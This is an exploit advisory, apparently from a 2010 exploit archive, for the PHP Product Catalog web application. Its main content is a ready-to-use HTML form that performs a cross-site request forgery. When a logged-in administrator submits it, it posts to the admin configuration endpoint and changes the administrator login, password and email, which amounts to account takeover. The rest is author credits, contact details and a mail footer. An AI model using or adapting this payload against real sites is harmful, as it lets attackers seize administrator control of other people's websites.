# Title: PHP Product Catalog - [ CSRF ] Change Administrator Password
# Date: 28/1/2010
# Author: bi0
# Software Link: http://www.tantumweb.com
# CVE : () 

                ______     __     ______             
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
                 
                 01000010 01101001 01001111      

[#]----------------------------------------------------------------[#]
# 
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
#
#  // Author Info 
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com    
# [x] Thanks: Pig,packetdeath,redking,sp1r1t and all my friends 
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit : 
# 
# [ CSRF ] 
#      
#     [ Login ]
#     http://[server]/[path]/admin.php
# 
# // Start CSRF
|-------------------------------------------------------------------------------|

<html>
<form action="http://[server]/admin.php?p=otherConfig&amp;sOption=save" method="POST">
Admin : <input type="text" name="login" value="admin" size="5" /><br>
Passwd  <input type="text" name="pass" value="123" size="5" /><br>
Email : <input type="text" name="email" value="test@example.com" size="16" /><br>
<input type="submit" name="save" value="Save">
</form>
</html>

|-------------------------------------------------------------------------------|
# // End of attack 
#
[#]------------------------------------------------------------------------------------------[#]

#EOF 		 	   		  
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969